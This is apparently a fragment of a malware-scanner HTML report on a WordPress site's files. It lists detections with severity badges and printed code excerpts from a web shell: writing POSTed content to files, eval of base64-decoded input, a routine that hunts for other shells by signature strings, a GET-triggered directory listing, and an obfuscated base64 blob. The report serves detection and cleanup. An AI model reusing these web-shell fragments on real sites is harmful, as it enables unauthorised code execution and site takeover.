</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_53").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/RPlgI8Vv7UD.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.35 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:21:49</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:21:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 44</span><br><table id="file_54" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 652</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; } else { if (!</span><span style="color: #0000BB">chmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">0755</span><span style="color: #007700">)) return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; </span><span style="color: #0000BB">$fp </span><span style="color: #007700">= </span><span style="color: #0000BB">fopen </span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #DD0000">"w"</span><span style="color: #007700">); if (</span><span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])) </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color="green"><b>Edited!</b></font>'</span><span style="color: #007700">; else </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color=</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"can not delete!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"ok!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">unzip_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">read_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clear_folder</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">only_read</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$original_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 236</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$start</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 262</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_filename</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void The string of the URL</span><span style="color: #007700">, if </span><span style="color: #0000BB">redirect needed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_filesize</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 455</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" gb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" mb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" kb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" b"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_time</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no info"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$time</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">perms</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$check</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$perms</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<font color=</span><span style="color: #0000BB">$color</span><span style="color: #DD0000">>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$perms</span><span style="color: #007700">.</span><span style="color: #DD0000">"</font>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 512</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">CMS</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 515</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Joomla!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"WordPress"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 519</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Unknown"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">folder_separate</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path2</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">side_bar</span><span style="color: #007700">(</span><span style="color: #0000BB">$make_file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edit_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$files</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">del_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"file not exists"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")"'; $search_str10 = '</span><span style="color: #0000BB">is_uploaded_file</span><span style="color: #DD0000">'; $search_str11 = '</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)) { $arr_php_file = findshells($_SERVER['</span><span style="color: #0000BB">DOCUMENT_</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">arr_php_file </span><span style="color: #007700">= </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 689d8acc <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 689d8acc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'juke'</span><span style="color: #007700">]))
<br />{
<br /> </span><span style="color: #0000BB">$arr_files </span><span style="color: #007700">= </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_54").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/SimplePie/library/SimplePie/Cache/Cache/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:31</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:31</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_55" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'AA18JE/wfUQsW4bPqWJVDZEy6xMeZRsnwhdv/95q68xlHe8+Dd8dwnnZgs8xxXv88ww1r7e8+PW+5b/9leii/a9BY+yP/6lq69/d/L3vZ/9fyt7uRNe4iXO7t7n613v4BlL01Ccnmvdyna++UjPlOlYWbt0n2n1WXsn5P++6kjxk/uxIqVQkMnpg1c+qmpyp0e5T7+/bkrnVt6BrMGjIdh61iYY7sZ7HgYckQvQiVRVYCwqrnWvzcfVl5apJtnceq8FMj5UhiXPAyO4CHRYGruDCgRGlAkk/UIiPB347tMCPD7q80wtVsfJYNIjdtcClBKRVE6jXM3Oqt3tgOyu6tD+vNa0YNfa/5nadjf6YFtatKXWZWgbw6d4Fub5qz+nE5LXvfHm+15Hc3or+ebkNjrIWiRxWQ1d10bJqedaB9TtvKHNtEvEfhtbuO+bq6n3r3cOD9TovSytCFQHSwjsDVDFV2GexHGc/MiHz7V9Au5n91ECsm0o...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
